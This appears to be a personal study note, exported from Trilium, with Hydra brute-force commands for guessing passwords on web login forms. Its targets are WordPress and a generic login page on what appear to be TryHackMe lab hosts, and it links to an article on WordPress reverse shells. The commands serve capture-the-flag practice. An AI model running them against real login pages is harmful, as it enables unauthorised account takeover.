<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>hydra</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>hydra</h1>

      <div class="ck-content"><pre><code class="language-text-plain">hydra -l &lt;user&gt; -P &lt;wordlist&gt; &lt;machine-ip&gt; http-get /
hydra -l Elliot -P fsociety.dic 10.10.164.233 http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PWD^:The password you entered for the username" -t 30</code></pre><pre><code class="language-text-plain">hydra -l 'adminaccount@itsupport.thm' -P word.txt 10.10.50.50 http-post-form '/login:email=^USER^&amp;password=^PASS^:Invalid email' -I -t 64</code></pre>

        <p>It shows error and  “use http-get” but that doesn't work and this request
          finds the password.</p>
        <p>wordpress hydra:</p><pre><code class="language-text-plain">hydra -l &lt;user&gt; -P rockyou.txt 10.10.10.10 http-post-form '/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;wp-submit=Log In&amp;testcookie=1:S=Location' -I -t 64</code></pre>

        <p><a href="https://www.hackingarticles.in/wordpress-reverse-shell/">https://www.hackingarticles.in/wordpress-reverse-shell/</a> </p>
      </div>
    </div>
  </body>

</html>